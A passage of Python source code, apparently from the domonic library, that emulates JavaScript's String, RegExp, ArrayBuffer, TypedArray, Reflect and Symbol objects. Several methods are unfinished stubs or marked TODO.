ES2021] Args: old ([str]): [word to remove] new ([str]): [word to replace it with] Returns: [str]: [new string with all occurences of old word replaced] """ return self.x.replace(old, new) # def localeCompare(): # """ Compares two strings in the current locale """ # pass def substr(self, start: int = 0, end: int = None): """ Extracts the characters from a string, beginning at a specified start position, and through the specified number of character """ if end is None: end = len(self.x) return self.x[start:start + end] def toLocaleLowerCase(self) -> str: """ Converts a string to lowercase letters, according to the host's locale """ # locale.setlocale() return self.x.lower() def toLocaleUpperCase(self) -> str: """ Converts a string to uppercase letters, according to the host's locale """ # locale.setlocale() return self.x.upper() def indexOf(self, searchValue: str, fromIndex: int = 0): """[returns the index within the calling String object of the first occurrence of the specified value, starting the search at fromIndex ] Args: searchValue (str): [The string value to search for.] fromIndex (int): [An integer representing the index at which to start the search] Returns: [type]: [The index of the first occurrence of searchValue, or -1 if not found.] """ try: return self.x.index(searchValue, fromIndex) except ValueError: return -1 def codePointAt(self, index: int): """[Returns the Unicode code point at the specified index (position)] Args: index (int): [index position] Returns: [type]: [the Unicode code point at the specified index (position)] """ return ord(self.x[index]) def padEnd(self, length: int, padChar: str = " ") -> str: """[Pads the end of a string with a specified character (repeated, if needed) to create a new string.] Args: length (int): [the length of the resulting string] padChar (str, optional): [the character to use for padding. Defaults to " "]. Returns: [str]: [the padded string] """ return str(self.x + padChar * (length - len(self.x))) def padStart(self, length: int, padChar: str = " ") -> str: """[Pads the start of a string with a specified character] Args: length (int): [the length of the resulting string] padChar (str, optional): [the character to use for padding. Defaults to " "]. Returns: [str]: [the padded string] """ return padChar * (length - len(self.x)) + self.x def localeCompare(self, comparisonString: str, locale: str = None, *args) -> int: """ method returns a number indicating whether a reference string comes before, or after, or is the same as the given string in sort order """ # if locale is None: # locale = self.locale # return locale.strcoll(self.x, comparisonString, *args) # pass # TODO - implement localeCompare raise NotImplementedError def trimStart(self, length: int): # TODO - huh?. length """[Removes whitespace from the beginning of a string.] Args: length (int): [the length of the resulting string] Returns: [str]: [the trimmed string] """ return self.x.lstrip() def trimEnd(self, length: int): # TODO - huh?. length """[Removes whitespace from the end of a string] Args: length (int): [the length of the resulting string] Returns: [type]: [the trimmed string] """ return self.x.rstrip() def includes(self, searchValue: str, position: int = 0) -> bool: """[returns true if the specified string is found within the calling String object,] Args: searchValue (str): [The string value to search for.] position (int, optional): [the position to search from]. Defaults to 0. Returns: [type]: [a boolean value indicating whether the search value was found.] 
""" return searchValue in self.x[position:] def search(self, searchValue: str, position: int = 0) -> bool: """[returns true if the specified string is found within the calling String object,] starting at the specified position. Args: searchValue (str): [The string value to search for.] position (int, optional): [the position to search from]. Defaults to 0. Returns: [type]: [a boolean value indicating whether the search value was found.] """ return searchValue in self.x[position:] def matchAll(self, pattern: str): """ Searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced. only replaces first one. """ return re.sub(pattern, "", self.x) def match(self, pattern: str): """ Searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced. only replaces first one. """ return re.match(pattern, self.x) def compile(self, pattern: str): """ Searches a string for a specified value, or a regular expression, and returns a new string where the specified values are replaced. only replaces first one. """ return re.compile(pattern) def lastIndexOf(self, searchValue: str, fromIndex: int = 0): """ returns the last index within the calling String object of the first occurrence of the specified value, starting the search at fromIndex """ return self.x.rindex(searchValue, fromIndex) # def test(self, pattern: str):? was this on string? # TODO - test all these def anchor(self, name: str): # from domonic.html import a # return a(str(self), _name=name) #TODO - no href bug return '<a name="{}">{}</a>'.format(name, self.x) def big(self): """[wraps the string in big tags] Returns: [str]: [the string in big tags] """ return "<big>" + self.x + "</big>" def blink(self): """[wraps the string in blink tags] Returns: [str]: [the string in blink tags] """ return "<blink>" + self.x + "</blink>" def bold(self): """[wraps the string in bold tags] Returns: [str]: [the string in bold tags] """ return "<b>" + self.x + "</b>" def fixed(self): """[wraps the string in fixed tags] Returns: [str]: [the string in fixed tags] """ return "<tt>" + self.x + "</tt>" def fontcolor(self, color: str): """[wraps the string in font tags with a specified color] Args: color (str): [the color to use] Returns: [str]: [the string in font tags] """ return "<font color=" + color + ">" + self.x + "</font>" def fontsize(self, size: str): """[wraps the string in font tags with a specified size] Args: size (str): [the size to use] Returns: [str]: [the string in font tags] """ return "<font size=" + size + ">" + self.x + "</font>" def italics(self): """[wraps the string in italics tags] Returns: [str]: [the string in italics tags] """ return "<i>" + self.x + "</i>" def link(self, url: str): """[wraps the string in a link tag] Args: url (str): [the url to use] Returns: [str]: [the string in a link tag] """ return "<a href=" + url + ">" + self.x + "</a>" def small(self): """[wraps the string in small tags] Returns: [str]: [the string in small tags] """ return "<small>" + self.x + "</small>" def strike(self): """[wraps the string in strike tags] Returns: [str]: [the string in strike tags] """ return "<strike>" + self.x + "</strike>" def sub(self): """[wraps the string in sub tags] Returns: [str]: [the string in sub tags] """ return "<sub>" + self.x + "</sub>" def sup(self): """[wraps the string in sup tags] Returns: [str]: [the string in sup tags] """ return "<sup>" + self.x + "</sup>" def div(self, *args, **kwargs): 
"""[wraps the string in a div tag] Returns: [str]: [the string in a div tag] """ from domonic.html import div return div(self.x, *args, **kwargs) def webpage(self): """[wraps the string in a webpage] Returns: [str]: [the string as a webpage] """ from domonic.html import (body, h1, head, html, link, meta, script, style, title) content = html( head( title(self.x), script(""), style(""), meta(_charset="utf-8"), link(_rel="stylesheet", _href=""), ), body( h1(self.x), ), ) return str(content) def __call__(self, tag: str, **kwargs): """ lets you transform a string into a dom element with the string as the content. also accepts a list of kwargs to pass as attributes i.e >>> test = String("time to take a mo") >>> test('div', _style="font-color:red;") >>> str(test('div', _style="font-color:red;")) """ from domonic.dom import Document return Document.createElement(tag, self.x, **kwargs) class RegExp(): def __init__(self, expression, flags=""): self.expression = expression self.flags = flags.lower() #: A string that contains the flags of the RegExp object. # self.multiline # Whether or not to search in strings across multiple lines. # self.source # The text of the pattern. # self.sticky # Whether or not the search is sticky # self.lastIndex # The index at which to start the next match. @property def dotAll(self): """[Whether . matches newlines or not.] Returns: [bool]: [True if dot matches newlines, False otherwise] """ return "s" in self.flags @dotAll.setter def dotAll(self, value: bool): """[Whether . matches newlines or not.] Args: value (bool): [True if dot matches newlines, False otherwise] """ if 's' not in self.flags: self.flags += "s" if value else "" @property def multiline(self): """[Whether . matches newlines or not.] Returns: [bool]: [True if dot matches newlines, False otherwise] """ return "m" in self.flags @multiline.setter def multiline(self, value: bool): """[Whether . matches newlines or not.] Args: value (bool): [True if dot matches newlines, False otherwise] """ if 'm' not in self.flags: self.flags += "m" if value else "" @property def source(self): """[The text of the pattern.] Returns: [str]: [The text of the pattern.] """ return self.expression @property def global_(self): """[Whether to test the regular expression against all possible matches in a string, or only against the first.] Returns: [bool]: [True if global, False otherwise] """ return "g" in self.flags @global_.setter def global_(self, value: bool): """[Whether to test the regular expression against all possible matches in a string, or only against the first.] Args: value (bool): [True if global, False otherwise] """ if 'g' not in self.flags: self.flags += "g" if value else "" @property def hasIndices(self): """[Whether the regular expression result exposes the start and end indices of captured substrings.] Returns: [bool]: [True if hasIndices, False otherwise] """ return "d" in self.flags @hasIndices.setter def hasIndices(self, value: bool): """[Whether the regular expression result exposes the start and end indices of captured substrings.] Args: value (bool): [True if hasIndices, False otherwise] """ if 'd' not in self.flags: self.flags += "d" if value else "" @property def ignoreCase(self): """[Whether to ignore case while attempting a match in a string.] Returns: [bool]: [True if ignoreCase, False otherwise] """ return "i" in self.flags @ignoreCase.setter def ignoreCase(self, value: bool): """[Whether to ignore case while attempting a match in a string.] 
Args: value (bool): [True if ignoreCase, False otherwise] """ if 'i' not in self.flags: self.flags += "i" if value else "" @property def unicode(self): """[Whether or not Unicode features are enabled.] Returns: [bool]: [True if unicode, False otherwise] """ return "u" in self.flags @unicode.setter def unicode(self, value: bool): """[Whether or not Unicode features are enabled.] Args: value (bool): [True if unicode, False otherwise] """ if 'u' not in self.flags: self.flags += "u" if value else "" def compile(self): """ (Re-)compiles a regular expression during execution of a script. """ pass # def exec(self, s: str): # TODO - test # """ Executes a search for a match in its string parameter. """ # class Match: # def __init__(self, index: int, match: str): # self.index = index # self.match = match # def __str__(self): # return f'{self.match}' # def __repr__(self): # return f'{self.match}' # def __getitem__(self, index): # return self.match[index] # matches = re.finditer(self.expression, s, flags=re.MULTILINE) # TODO - flags # return [Match(m.start(), m.group(0)) for m in matches] # TODO - wanted to change this to be like above. but d3 required me to rollback. # need to check if i modifed that implementation to fit my needs at the time. def exec(self, s: str): """ Executes a search for a match in its string parameter. """ # print("exec:", self.expression, s) m = re.search(self.expression, s) # print(m) if (m): return [s for s in m.groups()] def test(self, s: str): """[Tests for a match in its string parameter.] Args: s (str): [a string to match] Returns: [bool]: [True if match else False] """ m = re.match(self.expression, s) # print(m) if (m): return True else: return False def toString(self): """ Returns a string representation of the RegExp object. """ return self.__str__() def __str__(self): """" Returns a string representing the specified object. Overrides the Object.prototype.toString() method. """ return self.expression # def [@@match]() # Performs match to given string and returns match result. # def [@@matchAll]() # Returns all matches of the regular expression against a string. # def [@@replace]() # Replaces matches in given string with new substring. # def [@@search]() # Searches the match in given string and returns the index the pattern found in the string. # def [@@split]() # Splits given string into an array by separating the strin def ToInt32(v): return v >> 0 def ToUint32(v): return (v >> 0) if v >= 0 else ((v + 0x100000000) >> 0) class ArrayBuffer: def __init__(self, length): # self.length = length self.buffer = array.array('B', [0] * length) # self.byteLength = length self.isView = False @property def byteLength(self): return self.buffer.buffer_info()[1] def __getitem__(self, index): return self.buffer[index] def __setitem__(self, index, value): self.buffer[index] = value def __getattr__(self, name): # return getattr(self.buffer, name) # TODO - try on self if not get from buffer. (was this a todo)? return getattr(self.buffer, name) def __len__(self): # return self.length return len(self.buffer) @property def length(self): # return self.__length return len(self.buffer) # @length.setter def __str__(self): return str(self.buffer) def __repr__(self): return repr(self.buffer) def slice(self, start, end): return self.buffer[start:end] class DataView(ArrayBuffer): # ?? is this right. 
don't look lt def __init__(self, buffer, byteOffset=0, byteLength=None): super().__init__(byteLength) self.isView = True self.buffer = buffer self.byteOffset = byteOffset self.byteLength = byteLength def getUint8(self, index): return self.buffer.getUint8(self.byteOffset + index) def getInt8(self, index): return self.buffer.getInt8(self.byteOffset + index) def getUint16(self, index, littleEndian=False): return self.buffer.getUint16(self.byteOffset + index, littleEndian) def getInt16(self, index, littleEndian=False): return self.buffer.getInt16(self.byteOffset + index, littleEndian) def getUint32(self, index, littleEndian=False): return self.buffer.getUint32(self.byteOffset + index, littleEndian) def getInt32(self, index, littleEndian=False): return self.buffer.getInt32(self.byteOffset + index, littleEndian) def getFloat32(self, index, littleEndian=False): return self.buffer.getFloat32(self.byteOffset + index, littleEndian) def getFloat64(self, index, littleEndian=False): return self.buffer.getFloat64(self.byteOffset + index, littleEndian) def setUint8(self, index, value): self.buffer.setUint8(self.byteOffset + index, value) def setInt8(self, index, value): self.buffer.setInt8(self.byteOffset + index, value) def setUint16(self, index, value, littleEndian=False): self.buffer.setUint16(self.byteOffset + index, value, littleEndian) def setInt16(self, index, value, littleEndian=False): self.buffer.setInt16(self.byteOffset + index, value, littleEndian) class TypedArray: BYTES_PER_ELEMENT = 1 def __init__(self, *args): """[ creates a new Int8Array can take the following forms: Int8Array() Int8Array(length) Int8Array(typedArray) Int8Array(object) Int8Array(buffer) Int8Array(buffer, byteOffset) Int8Array(buffer, byteOffset, length) ] """ self.name = "Int8Array" self.byteOffset = 0 # self.BYTES_PER_ELEMENT = Int8Array.BYTES_PER_ELEMENT if len(args) == 0: self.buffer = array.array('B', [0] * 0) self.length = 0 self.byteLength = self.length * self.BYTES_PER_ELEMENT self.isView = False return arg = args[0] # print(arg) # print(type(arg)) if isinstance(arg, (Int8Array, ArrayBuffer)): # self.buffer = arg.buffer # self.byteLength = arg.byteLength # self.length = arg.length # self.isView = arg.isView self.buffer = arg if len(args) > 1: self.byteOffset = args[1] else: self.byteOffset = 0 self.byteOffset = ToUint32(self.byteOffset) # if (this.byteOffset > this.buffer.byteLength) { # throw new RangeError("byteOffset out of range"); # } if self.byteOffset > self.buffer.byteLength: # raise RangeError("byteOffset out of range") raise Exception("byteOffset out of range") # if (this.byteOffset % this.BYTES_PER_ELEMENT) { # // The given byteOffset must be a multiple of the element size of the specific type, # otherwise an exception is raised. 
# throw new RangeError("ArrayBuffer length minus the byteOffset is not a multiple of the element size."); # } if self.byteOffset % self.BYTES_PER_ELEMENT: # raise RangeError("ArrayBuffer length minus the byteOffset is not a multiple of the element size.") raise Exception("ArrayBuffer length minus the byteOffset is not a multiple of the element size.") if (len(args) < 3): self.byteLength = self.buffer.byteLength - self.byteOffset if (self.byteLength % self.BYTES_PER_ELEMENT): # raise RangeError("length of buffer minus byteOffset not a multiple of the element size"); raise Exception("length of buffer minus byteOffset not a multiple of the element size") self.length = self.byteLength / self.BYTES_PER_ELEMENT else: self.length = ToUint32(args[2]) self.byteLength = self.length * self.BYTES_PER_ELEMENT if ((self.byteOffset + self.byteLength) > self.buffer.byteLength): # raise RangeError("byteOffset and length reference an area beyond the end of the buffer"); raise Exception("byteOffset and length reference an area beyond the end of the buffer") return # elif isinstance(arg, array.array): # print('c!!!!') # self.buffer = arg # self.byteLength = len(arg) # self.length = len(arg) # self.isView = False # if len(args) == 2: # self.byteOffset = args[1] # if len(args) == 3: # self.byteOffset = args[1] # self.length = args[2] # return elif isinstance(arg, dict): self.buffer = array.array('B', [0] * 0) self.byteLength = 0 # self.length = 0 self.isView = False self.set(arg) return elif isinstance(arg, int): # self.buffer = array.array('B', [0] * arg) print('a!') # self.buffer = ArrayBuffer(arg) # self.byteLength = arg # self.length = arg # self.isView = False # // Constructor(unsigned long length) self.length = ToInt32(args[0]) if (self.length < 0): raise Exception('ArrayBufferView size is not a small enough positive integer') self.byteLength = self.length * self.BYTES_PER_ELEMENT self.buffer = ArrayBuffer(self.byteLength) self.byteOffset = 0 return elif isinstance(arg, list): # print('bb!', arg) # self.buffer = array.array('B', arg) # self.byteLength = len(arg) # self.length = len(arg) # self.isView = False # // Constructor(sequence<type> array) sequence = arg self.length = ToUint32(len(sequence)) self.byteLength = self.length * self.BYTES_PER_ELEMENT self.buffer = ArrayBuffer(self.byteLength) self.byteOffset = 0 for i in range(self.length): s = sequence[i] self.__setitem__(i, Number(s)) return else: raise TypeError("Invalid argument type") # @property # def length(self): # return self.buffer.buffer_info()[1] # @length.setter # def length(self, value): # self.buffer.length = value @property # TODO - test try this for sneaky way of binding to exsiting array methods? 
def args(self): return self.buffer @staticmethod def of(*args): # Creates a new Int8Array with a variable number of arguments return Int8Array(args) @staticmethod def from_(thing): # Creates a new Int8Array from an array-like or iterable object return Int8Array(thing) # def __getitem__(self, index): # return self.buffer[index] # def __setitem__(self, index, value): # self.buffer[index] = value # // getter type (unsigned long index); def __getitem__(self, index): if index is None: raise SyntaxError("Not enough arguments") index = ToUint32(index) if (index >= self.length): return undefined b = [] i = 0 o = self.byteOffset + index * self.BYTES_PER_ELEMENT for i in range(0, self.BYTES_PER_ELEMENT): b.append(self.buffer[o]) o += 1 return self._unpack(b) # // NONSTANDARD: convenience alias for getter: type get(unsigned long index); get = __getitem__ # // setter void (unsigned long index, type value); def __setitem__(self, index, value): # print('set', index, value) if (index is None and value is None): raise SyntaxError("Not enough arguments") index = ToUint32(index) if (index >= self.length): return undefined b = self._pack(value) # print(b) # print( self._pack(10) ) # print( self._pack(20) ) # print( self._pack(30) ) i = 0 o = self.byteOffset + index * self.BYTES_PER_ELEMENT for i in range(0, self.BYTES_PER_ELEMENT): self.buffer[o] = b[i] # // void set(TypedArray array, optional unsigned long offset); # // void set(sequence<type> array, optional unsigned long offset); def set(self, index, value): if (index is None): raise SyntaxError("Not enough arguments") # arr = None # sequence = None # offset = None # nlen = None # i = None # s = None # d = None # byteOffset = None # byteLength = None # tmp = None if (type(index, object) and index == self): # void set(TypedArray arr, optional unsigned long offset) arr = index offset = ToUint32(value) if (offset + arr.length > self.length): # raise RangeError("Offset plus length of array is out of range") raise Exception("Offset plus length of array is out of range") byteOffset = self.byteOffset + offset * self.BYTES_PER_ELEMENT byteLength = arr.length * self.BYTES_PER_ELEMENT if (arr.buffer == self.buffer): tmp = [] s = arr.byteOffset for i in range(0, byteLength): tmp[i] = arr.buffer[s] s += 1 d = byteOffset for i in range(0, byteLength): self.buffer[d] = tmp[i] d += 1 else: s = arr.byteOffset d = byteOffset for i in range(0, byteLength): self.buffer[d] = arr.buffer[s] s += 1 d += 1 elif (type(index, object) and index != self): # void set(sequence<type> arr, optional unsigned long offset); sequence = index nlen = ToUint32(sequence.length) offset = ToUint32(value) if (offset + nlen > self.length): # raise RangeError("Offset plus length of arr is out of range") raise Exception("Offset plus length of arr is out of range") for i in range(0, len): s = sequence[i] self._setter(offset + i, Number(s)) else: raise TypeError("Unexpected argument type(s)") # // TypedArray subarray(long begin, optional long end); def subarray(self, start, end): def clamp(v, min, max): m1 = max if v > max else v return min if v < min else m1 if start is None: start = 0 if end is None: end = self.length start = ToInt32(start) end = ToInt32(end) if (start < 0): start = self.length + start if (end < 0): end = self.length + end start = clamp(start, 0, self.length) end = clamp(end, 0, self.length) nlen = end - start if (nlen < 0): nlen = 0 return self.__init__(self.buffer, self.byteOffset + start * self.BYTES_PER_ELEMENT, nlen) def as_signed(value, bits): """ Converts an unsigned integer 
to a signed integer. """ s = 32 - bits mask = (1 << s) - 1 return (value & mask) - (value & (mask << s)) def as_unsigned(value, bits): s = 32 - bits mask = (1 << s) - 1 return value & mask class __byteutils__(): def packI8(self, n): return [n & 0xff] # return struct.pack('B', n) def unpackI8(self, b): return as_signed(b[0], 8) # return struct.unpack('B', b)[0] def packU8(self, n): return [n & 0xff] # return struct.pack('B', n) def unpackU8(self, bytes): return as_unsigned(bytes[0], 8) # return struct.unpack('B', bytes)[0] def packU8Clamped(self, n): n = Math.round(Number(n)) # return [n < 0 ? 0 : n > 0xff ? 0xff : n & 0xff] if (n < 0): return [0] elif (n > 0xff): return [0xff] else: return [n & 0xff] # return struct.pack('B', n) def packI16(self, n): return [(n >> 8) & 0xff, n & 0xff] # return struct.pack('>H', n) def unpackI16(self, bytes): return as_signed(bytes[0] << 8 | bytes[1], 16) # return struct.unpack('>H', bytes)[0] def packU16(self, n): return [(n >> 8) & 0xff, n & 0xff] # return struct.pack('>H', n) def unpackU16(self, bytes): return as_unsigned(bytes[0] << 8 | bytes[1], 16) # return struct.unpack('>H', bytes)[0] def packI32(self, n): return [(n >> 24) & 0xff, (n >> 16) & 0xff, (n >> 8) & 0xff, n & 0xff] # return struct.pack('>I', n) def unpackI32(self, bytes): return as_signed(bytes[0] << 24 | bytes[1] << 16 | bytes[2] << 8 | bytes[3], 32) # return struct.unpack('>I', bytes)[0] def packU32(self, n): return [(n >> 24) & 0xff, (n >> 16) & 0xff, (n >> 8) & 0xff, n & 0xff] # return struct.pack('>I', n) def unpackU32(self, bytes): return as_unsigned(bytes[0] << 24 | bytes[1] << 16 | bytes[2] << 8 | bytes[3], 32) # return struct.unpack('>I', bytes)[0] def packIEEE754(self, v, ebits, fbits): bias = (1 << (ebits - 1)) - 1 def roundToEven(n): w = Math.floor(n) f = n - w if (f < 0.5): return w if (f > 0.5): return w + 1 # return w % 2 ? w + 1 : w return w if (w % 2) else w + 1 # Compute sign, exponent, fraction if (v != v): # NaN # http://dev.w3.org/2006/webapi/WebIDL/#es-type-mapping e = (1 << ebits) - 1 f = pow(2, fbits - 1) s = 0 elif (v == Global.Infinity or v == -Global.Infinity): e = (1 << ebits) - 1 f = 0 # s = (v < 0) ? 1 : 0 s = 1 if (v < 0) else 0 elif (v == 0): e = 0 f = 0 s = 1 if (1 / v == -Global.Infinity) else 0 else: s = v < 0 v = abs(v) if (v >= pow(2, 1 - bias)): e = min(Math.floor(Math.log(v) / Math.LN2), 1023) f = roundToEven(v / pow(2, e) * pow(2, fbits)) if (f / pow(2, fbits) >= 2): e = e + 1 f = 1 if (e > bias): # Overflow e = (1 << ebits) - 1 f = 0 else: # Normalized e = e + bias f = f - pow(2, fbits) else: # Denormalized e = 0 f = roundToEven(v / pow(2, 1 - bias - fbits)) # Pack sign, exponent, fraction bits = [] for i in range(fbits): bits.append(f % 2) f = Math.floor(f / 2) for i in range(ebits): bits.append(e % 2) e = Math.floor(e / 2) bits.append(s) bits.reverse() mystr = bits.join('') # Bits to bytes b = [] while (mystr.length): b.push(parseInt(mystr.substring(0, 8), 2)) mystr = mystr.substring(8) return b def unpackIEEE754(self, bytes, ebits, fbits): # Bytes to bits bits = [] for i in range(len(bytes)): b = bytes[i] for j in range(8): bits.append(1 if b % 2 else 0) b = b >> 1 bits.reverse() mystr = bits.join('') # Unpack sign, exponent, fraction bias = (1 << (ebits - 1)) - 1 # s = parseInt(str.substring(0, 1), 2) ? -1 : 1 s = -1 if (mystr[0] == '1') else 1 e = parseInt(mystr.substring(1, 1 + ebits), 2) f = parseInt(mystr.substring(1 + ebits), 2) # // Produce number if (e == (1 << ebits) - 1): # return f !== 0 ? 
NaN : s * Infinity if (f != 0): return Global.NaN else: return s * Global.InfInfinity elif (e > 0): # Normalized return s * pow(2, e - bias) * (1 + f / pow(2, fbits)) elif (f != 0): # Denormalized return s * pow(2, -(bias - 1)) * (f / pow(2, fbits)) else: return -0 if s < 0 else 0 def unpackF64(self, b): return self.unpackIEEE754(b, 11, 52) # return struct.unpack('>d', b)[0] def packF64(self, v): return self.packIEEE754(v, 11, 52) # return struct.pack('>d', v) def unpackF32(self, b): return self.unpackIEEE754(b, 8, 23) # return struct.unpack('>f', b)[0] def packF32(self, v): return self.packIEEE754(v, 8, 23) # return struct.pack('>f', v) Int8Array = type('Int8Array', (TypedArray,), {'name': 'Int8Array', '_pack': __byteutils__.packI8, '_unpack': __byteutils__.unpackI8}) Int8Array.BYTES_PER_ELEMENT = 1 Uint8Array = type('Uint8Array', (TypedArray,), {'name': 'Uint8Array', '_pack': __byteutils__.packU8, '_unpack': __byteutils__.unpackU8}) Uint8Array.BYTES_PER_ELEMENT = 1 Uint8ClampedArray = type('Uint8ClampedArray', (TypedArray,), {'name': 'Uint8ClampedArray', '_pack': __byteutils__.packU8Clamped, '_unpack': __byteutils__.unpackU8}) Uint8ClampedArray.BYTES_PER_ELEMENT = 1 Int16Array = type('Int16Array', (TypedArray,), {'name': 'Int16Array', '_pack': __byteutils__.packI16, '_unpack': __byteutils__.unpackI16}) Int16Array.BYTES_PER_ELEMENT = 2 Uint16Array = type('Uint16Array', (TypedArray,), {'name': 'Uint16Array', '_pack': __byteutils__.packU16, '_unpack': __byteutils__.unpackU16}) Uint16Array.BYTES_PER_ELEMENT = 2 Int32Array = type('Int32Array', (TypedArray,), {'name': 'Int32Array', '_pack': __byteutils__.packI32, '_unpack': __byteutils__.unpackI32} ) Int32Array.BYTES_PER_ELEMENT = 4 Uint32Array = type('Uint32Array', (TypedArray,), {'name': 'Uint32Array', '_pack': __byteutils__.packU32, '_unpack': __byteutils__.unpackU32}) Uint32Array.BYTES_PER_ELEMENT = 4 Float32Array = type('Float32Array', (TypedArray,), {'name': 'Float32Array', '_pack': __byteutils__.packF32, '_unpack': __byteutils__.unpackF32}) Float32Array.BYTES_PER_ELEMENT = 4 Float64Array = type('Float64Array', (TypedArray,), {'name': 'Float64Array', '_pack': __byteutils__.packF64, '_unpack': __byteutils__.unpackF64}) Float64Array.BYTES_PER_ELEMENT = 8 # BigInt64Array = type('BigInt64Array', # (TypedArray,), {'name': 'BigInt64Array', '_pack': __byteutils__.packI64, '_unpack': __byteutils__.unpackI64}) # BigInt64Array.BYTES_PER_ELEMENT = 8 # BigUint64Array = type('BigUint64Array', # (TypedArray,), {'name': 'BigUint64Array', '_pack': __byteutils__.packU64, '_unpack': __byteutils__.unpackU64}) # BigUint64Array.BYTES_PER_ELEMENT = 8 # TODO - test class Error(Exception): ''' Raise Errors ''' def __init__(self, message, *args, **kwargs): self.message = message super(Error, self).__init__(message) # def __str__(self): # return self.message # Error # AggregateError # EvalError # InternalError # RangeError # ReferenceError # SyntaxError # TypeError # URIError # ---- STUBBING OUT SOME NEW ONES TO WORK ON ---- class Reflect(): """ The Reflect object provides the following static functions which have the same names as the proxy handler methods. Some of these methods are also the same as corresponding methods on Object, although they do have some subtle differences between them. """ @staticmethod def ownKeys(target): """ Returns an array of the target object's own (not inherited) property keys. 
""" return target.keys() # return target.__dict__.keys() @staticmethod def apply(target, thisArgument, argumentsList): """ Calls a target function with arguments as specified by the argumentsList parameter. See also Function.prototype.apply(). """ return target(*argumentsList) @staticmethod def construct(target, argumentsList, newTarget): """ The new operator as a function. Equivalent to calling new target(...argumentsList). Also provides the option to specify a different prototype. """ raise NotImplementedError @staticmethod def defineProperty(target, propertyKey, attributes): """ Similar to Object.defineProperty(). Returns a Boolean that is true if the property was successfully defined. """ raise NotImplementedError @staticmethod def deleteProperty(target, propertyKey): """ The delete operator as a function. Equivalent to calling delete target[propertyKey]. """ raise NotImplementedError @staticmethod def get(target, propertyKey, receiver): """ Returns the value of the property. Works like getting a property from an object (target[propertyKey]) as a function. """ raise NotImplementedError @staticmethod def getOwnPropertyDescriptor(target, propertyKey): """ Similar to Object.getOwnPropertyDescriptor(). Returns a property descriptor of the given property if it exists on the object, undefined otherwise. """ raise NotImplementedError getPrototypeOf = Object.getPrototypeOf # isExtensible = Object.isExtensible @staticmethod def has(target, propertyKey): """ Returns a Boolean indicating whether the target has the property. Either as own or inherited. Works like the in operator as a function. """ raise NotImplementedError @staticmethod def preventExtensions(target): """ Similar to Object.preventExtensions(). Returns a Boolean that is true if the update was successful. """ raise NotImplementedError @staticmethod def set(target, propertyKey, value, receiver): """ A function that assigns values to properties. Returns a Boolean that is true if the update was successful. """ raise NotImplementedError @staticmethod def setPrototypeOf(target, prototype): """ A function that sets the prototype of an object. Returns a Boolean that is true if the update was successful. """ raise NotImplementedError class Symbol(): # a global registry for symbols registry = [] # Creates a new Symbol object. def __init__(self, symbol): self.symbol = symbol self.description = None self.registry.append(self) # self.__class__.registry = self.registry def hasInstance(self, obj): """[A method determining if a constructor object recognizes an object as its instance. Used by instanceof.] Args: obj ([type]): [a constructor object] Returns: [type]: [True if obj is an instance of this symbol, False otherwise] """ return self.symbol == obj.symbol def isConcatSpreadable(self): """ A Boolean value indicating if an object should be flattened to its array elements. Used by Array.prototype.concat().""" return False def iterator(self, obj): """ A method returning the default iterator for an object. Used by for...of. """ return iter(obj) def asyncIterator(self, obj): """ A method that returns the default AsyncIterator for an object. Used by for await...of. """ return iter(obj) # A method that matches against a string, also used to determine if an object may be used as a regular expression. def match(self, item): """ A method that matches the symbol against a string, also used to determine if an object may be used as a regular expression. 
""" raise NotImplementedError # A method that returns an iterator, that yields matches of the regular expression against a string. # Used by String.prototype.matchAll(). # def matchAll(self, obj): # if isinstance(obj, str): # return obj == self.symbol # return False # A method that replaces matched substrings of a string. Used by String.prototype.replace(). # def replace(self, # A method that returns the index within a string that matches the regular expression. # Used by String.prototype.search(). def search(self): raise NotImplementedError # A method that splits a string at the indices that match a regular expression. Used by String.prototype.split(). def split(self): raise NotImplementedError # A constructor function that is used to create derived objects. def species(self): raise NotImplementedError # A method converting an object to a primitive value. def toPrimitive(self): raise NotImplementedError # A string value used for the default description of an object. # Used by Object.prototype.toString(). def toStringTag(self): raise NotImplementedError # An object value of whose own and inherited property names are excluded from the with environment bindings of the associated object. def unscopables(self): raise NotImplementedError # @staticmethod # def for(key): # """ Searches for existing Symbols with the given key and returns it if found. # Otherwise a new Symbol gets created in the global Symbol registry with key. """ # raise NotImplementedError # @staticmethod # def keyFor(sym) # """ Retrieves a shared Symbol key from the global Symbol registry for the given Symbol. """ # raise NotImplementedError def toSource(self): """ Returns a string containing the source of the Symbol. Overrides the Object.prototype.toSource() method. """ raise NotImplementedError def toString(self): """ Returns a string containing the description of the Symbol. Overrides the Object.prototype.toString() method. """ raise NotImplementedError def valueOf(self): """ Returns the Symbol. Overrides the Object.prototype.valueOf() method. """ raise NotImplementedError # class _TNow: # def timeZone(): # pass # def instant(): # pass # def plainDateTime(calendar, temporalTimeZoneLike): # pass # def plainDateTimeISO(temporalTimeZoneLike): # pass # def zonedDateTime(calendar, temporalTimeZoneLike): # pass # def zonedDateTimeISO(temporalTimeZoneLike): # pass # def plainDate(calendar, temporalTimeZoneLike): # pass # def plainDateISO(temporalTimeZoneLike): # pass # def plainTimeISO(temporalTimeZoneLike): # pass # class Temporal(Object): # @staticmethod # def Now(self): # return _TNow() # @staticmethod # def _from(self, temporal): # pass ''' class Atomics(): """ The Atomics object provides atomic operations as static methods They are used with SharedArrayBuffer and ArrayBuffer objects. When memory is shared, multiple threads can read and write the same data in memory. Atomic operations make sure that predictable values are written and read, that operations are finished before the next operation starts and that operations are not interrupted. Wait and notify The wait() and notify() methods are modeled on Linux futexes ("fast user-space mutex") and provide ways for waiting until a certain condition becomes true and are typically used as blocking constructs. """ @staticmethod def add(array, index, value): """ Adds the provided value to the existing value at the specified index of the array. 
Returns the old value at that index.""" return array.add(index, value) def and_(array, index, value): """ Computes a bitwise AND on the value at the specified index of the array with the provided value. Returns the old value at that index.""" raise NotImplementedError @staticmethod """ Stores a value at the specified index of the array, if it equals a value. Returns the old value.""" def compareExchange(array, index, value): raise NotImplementedError @staticmethod def exchange(): """ Stores a value at the specified index of the array. Returns the old value.""" raise NotImplementedError @staticmethod def isLockFree(size): """ An optimization primitive that can be used to determine whether to use locks or atomic operations. Returns true if an atomic operation on arrays of the given element size will be implemented using a hardware atomic operation (as opposed to a lock). Experts only.""" raise NotImplementedError @staticmethod def load(): """ Returns the value at the specified index of the array.""" raise NotImplementedError # @staticmethod # """ Notifies agents that are waiting on the specified index of the array. # Returns the number of agents that were notified.""" # def notify( @staticmethod def or_(): """ Computes a bitwise OR on the value at the specified index of the array with the provided value. Returns the old value at that index.""" raise 